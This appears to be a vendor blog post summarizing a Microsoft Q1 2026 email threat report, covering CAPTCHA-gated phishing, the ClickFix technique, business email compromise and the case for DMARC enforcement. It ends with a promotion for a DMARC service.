Microsoft Threat Intelligence published its Q1 2026 Email Threat Landscape Report in late April, and the headline figure is difficult to absorb: 8.3 billion email-based phishing threats detected in the first three months of 2026. That is roughly 92 million per day, every day of the quarter. The raw volume matters less than what the report reveals about how those threats are being delivered and why the delivery methods are changing so rapidly.
Two trends in the report deserve particular attention from security teams and IT administrators: the explosive growth in CAPTCHA-gated phishing, and the rise of a social engineering technique called ClickFix that removes the need for file downloads entirely by turning the victim into the final delivery mechanism.
What CAPTCHA-Gated Phishing Actually Does
CAPTCHA-gated phishing is not new, but its March 2026 numbers are striking. After declining in January and February, the volume of CAPTCHA-gated attacks more than doubled in March, reaching 11.9 million. That is the highest monthly volume Microsoft has observed in over a year, representing a 125% increase in a single month.
The technique works by placing a real CAPTCHA challenge in front of the credential-harvesting page. This is not for the benefit of the victim: it is explicitly designed to block the automated scanning tools that security vendors use to identify and blacklist phishing sites. When a scanner visits the URL and encounters the CAPTCHA, it cannot proceed to analyze the content. The phishing page behind it stays active longer, reaches more victims before detection, and generates more successful credential captures per campaign.
The delivery formats for CAPTCHA-gated content shifted sharply in March: PDF attachments quadrupled, HTML file usage nearly tripled, and DOC/DOCX delivery increased almost fivefold. The rapid experimentation across attachment types indicates that attackers were actively testing which formats produced the best combination of inbox placement and evasion longevity.
ClickFix: When the Victim Becomes the Delivery Mechanism
ClickFix is a variant within the broader CAPTCHA-gating trend, and it deserves separate attention because of how completely it sidesteps conventional email security, including DMARC.
In a ClickFix attack, the victim arrives at a web page, typically through a phishing link embedded in an email or delivered through a compromised site. The page displays what appears to be a CAPTCHA verification challenge or a browser security prompt. It instructs the user to complete verification by pressing Win+R, then Ctrl+V, then Enter. What the victim does not know is that the page’s JavaScript has already silently written a malicious command to the device clipboard. Following the instructions opens the Windows Run dialog, pastes the attacker’s PowerShell or mshta command, and executes it.
No file download prompt appears. No suspicious attachment needs to be opened. The infection chain runs entirely through actions that look, to both the user and to endpoint security tools, like normal keyboard input.
ClickFix matters for email security specifically because the initial delivery of the phishing link can pass every authentication check. The email carrying the link may come from a properly authenticated sender, pass SPF and DKIM, and satisfy DMARC alignment. The attack does not spoof a domain; it uses legitimate delivery infrastructure to route a victim to an attacker-controlled page. DMARC enforcement on the sending domain does nothing to prevent this.
What DMARC Does and Does Not Address
Reading the Q1 report, it would be easy to conclude that DMARC is losing relevance as attackers pivot to post-delivery techniques. That conclusion is wrong, but the reasoning behind it is worth working through.
DMARC enforcement at p=reject stops one specific threat: unauthorized use of your domain in the From address of emails you did not send. When an attacker registers a lookalike domain or tries to directly spoof your brand in phishing campaigns against your customers, vendors, or partners, DMARC at enforcement means those messages do not reach any inbox.
That protection is distinct from what ClickFix or CAPTCHA-gated phishing exploit. Those attacks typically operate from attacker-controlled infrastructure, not from spoofed sender domains. They do not need your domain to succeed.
Organizations that lack DMARC enforcement are not better protected against ClickFix as a result. They face both threats: direct spoofing of their domain identity, and post-delivery social engineering attacks. DMARC enforcement removes one of those two vectors. That is not a minor gain in a threat environment generating 8.3 billion attacks per quarter.
The EasyDMARC 2026 DMARC Adoption Report provides the current baseline. Of the top 1.8 million domains analyzed, 52.1% have a DMARC record in place. But only around 9% combine enforcement-level policies with aggregate reporting, the configuration required to both block spoofing and maintain visibility. The remaining domains with DMARC at p=none are collecting data about spoofing attempts but blocking nothing.
Business Email Compromise Adds Context
Microsoft tracked 10.7 million Business Email Compromise (BEC) attacks in Q1. Between 82% and 84% of initial contact emails in BEC campaigns used generic rapport-building messages rather than immediate financial requests. Attackers are patient: they establish trust first, then introduce the fraudulent wire transfer or gift card request later.
BEC depends on convincing impersonation of domain identity. When attackers spoof the email address of a CFO, a vendor, or a known business contact, DMARC enforcement at the receiving organization’s sending domains makes direct spoofing of those identities significantly more difficult. Not impossible, because lookalike domains exist outside DMARC’s scope, but substantially harder than impersonating a domain with no enforcement at all.
Three Actions the Q1 Data Supports
1. Move to enforcement. The Q1 volume data provides a clear argument for organizations that have been treating p=none as an acceptable resting state. The threat environment is not improving. Publish p=quarantine once aggregate reports confirm that all legitimate sending sources are authenticated, then escalate to p=reject. Each step materially reduces the attack surface for BEC and spoofing campaigns.
2. Review aggregate reports for undiscovered senders. The most common reason organizations stall at p=none is undiscovered legitimate sending sources: CRM platforms, marketing tools, transactional email services, and third-party integrations that send on behalf of the domain without proper DKIM or SPF alignment. Aggregate reports identify every source. A systematic review resolves the authentication gaps that make enforcement risky.
3. Brief your team on ClickFix patterns. DMARC and email authentication cannot stop ClickFix because ClickFix operates after delivery. Security awareness training that specifically describes the Win+R, Ctrl+V pattern, and that tells users no legitimate site will ever instruct them to paste commands into their operating system, is a direct countermeasure for a technique that bypasses every technical control before it.
Tycoon2FA: What Platform Disruption Tells Us
The Tycoon2FA platform powered more than three-quarters of CAPTCHA-gated phishing sites at the end of 2025. Microsoft’s March 2026 disruption operation reduced associated email volume by 15% for the remainder of the month and reduced access to active phishing pages. Within weeks, Tycoon2FA had shifted hosting providers, and by late March, 41% of its active domains used .RU TLDs.
Platform disruptions matter, but they do not replace structural defenses. Attackers adapt. Organizations that wait for infrastructure takedowns as their primary protection strategy will find themselves repeatedly racing an adversary with faster adaptation cycles. DMARC enforcement, SPF hygiene, and continuous aggregate report monitoring are structural controls that impose permanent costs on attackers attempting to abuse domain identity, regardless of which platform or toolkit they use.
The Q1 2026 data makes one thing clear: the complexity and volume of email-based threats are not decreasing. The organizations best positioned to weather this environment are those that have closed the baseline spoofing vector with DMARC enforcement and are using aggregate reporting to maintain ongoing visibility into how their domain identity is being used.
Your DMARC configuration is the foundation everything else builds on. If your policy is still p=none, Q2 is the time to change that. Start your free account at Excello and get to enforcement.